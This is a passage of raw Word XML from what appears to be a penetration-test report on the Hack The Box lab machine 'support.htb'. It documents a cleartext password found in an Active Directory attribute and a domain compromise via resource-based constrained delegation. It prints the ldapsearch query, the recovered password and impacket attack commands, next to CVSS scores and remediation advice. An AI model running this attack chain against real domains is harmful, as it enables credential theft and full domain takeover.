          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>result = bytes([(b ^ key[</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(key)]) ^ 0xDF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b in enumerate(data)])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>result.decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8730" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc233206077"/>
      <w:r>
        <w:t>3. Cleartext Credential Stored in Active Directory “info” Attribute — High</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5C3F" w14:paraId="081D87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31" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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32" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-522 (Insufficiently Protected Credentials)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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CBA7"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D8734" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS 3.1 Score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35" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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37" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Vector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38" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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3A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description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3B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The support user account’s info attribute contained a cleartext password. This </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>freetext</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> attribute is readable by any account with general LDAP read access and is not intended for credential storage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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3D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Security Impact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3E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Directly yielded valid interactive credentials for the support user, a member of Remote Management Users, enabling authenticated </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WinRM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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40" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected Host/User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41" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>support.htb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / support user account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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43" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation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44" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Audit all AD objects for credentials in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>freetext</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> attributes. Enforce policy prohibiting credential storage outside approved secrets management systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D874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46" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>External References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47" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://attack.mitre.org/techniques/T1552/001/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D8749" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Finding Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D874A"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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ldapsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -x -H ldap://10.129.11.223 -D "support\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>" -w '&lt;password&gt;' \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -b "DC=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>support,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>" "(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sAMAccountName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=support)" info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D874C" w14:textId="21FD00DB" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4" w:rsidP="00C70BC6">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info: Ironside47pleasure40Watchful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D874D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc233206078"/>
      <w:r>
        <w:t xml:space="preserve">4. Excessive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ACE on Domain Controller Computer Object — Critical</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5C3F" w14:paraId="081D875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4E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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4F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-269 (Improper Privilege Management)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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6B0AA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D8751" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS 3.1 Score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52" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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54" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Vector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55" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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57" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description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58" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The SHARED SUPPORT ACCOUNTS group, of which support is a member, holds a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GenericAll</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ACE over the Domain Controller’s computer object (DC$), permitting full control including the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msDS-AllowedToActOnBehalfOfOtherIdentity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> attribute used in Resource-Based Constrained Delegation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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5A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Security Impact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5B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enabled full domain compromise via RBCD: creation of a controlled machine account, delegation configuration, impersonation of Administrator, and extraction of the Administrator NT hash. Scope is Changed — a low-privileged group’s permission cascades into control of the entire domain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D875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5D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected Host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5E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>dc.support.htb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (DC$)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D876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60" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation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61" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove unnecessary </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GenericAll</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/delegation-capable ACEs on computer objects, especially Domain Controllers. Reduce </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-DS-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MachineAccountQuota</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> to 0. Enable advanced auditing on delegation attribute changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D87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63" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>External References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64" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://attack.mitre.org/techniques/T1558/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D8766" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Finding Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8767" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">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 xml:space="preserve">SUPPORT → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MemberOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> → SHARED SUPPORT ACCOUNTS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SHARED SUPPORT ACCOUNTS → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> → DC.SUPPORT.HTB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8769" w14:textId="60C45E4E" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4" w:rsidP="00C70BC6">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
          <w:left w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
          <w:bottom w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
          <w:right w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">addcomputer.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>support.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/support:'&lt;password&gt;' -computer-name 'FAKE$' \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -computer-pass 'Password123!'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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">rbcd.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>support.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/support:'&lt;password&gt;' -delegate-from 'FAKE$' \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -delegate-to 'DC$' -action write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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">getST.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>support.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/FAKE$:'Password123!' -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>spn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cifs</w:t>
      </w:r>
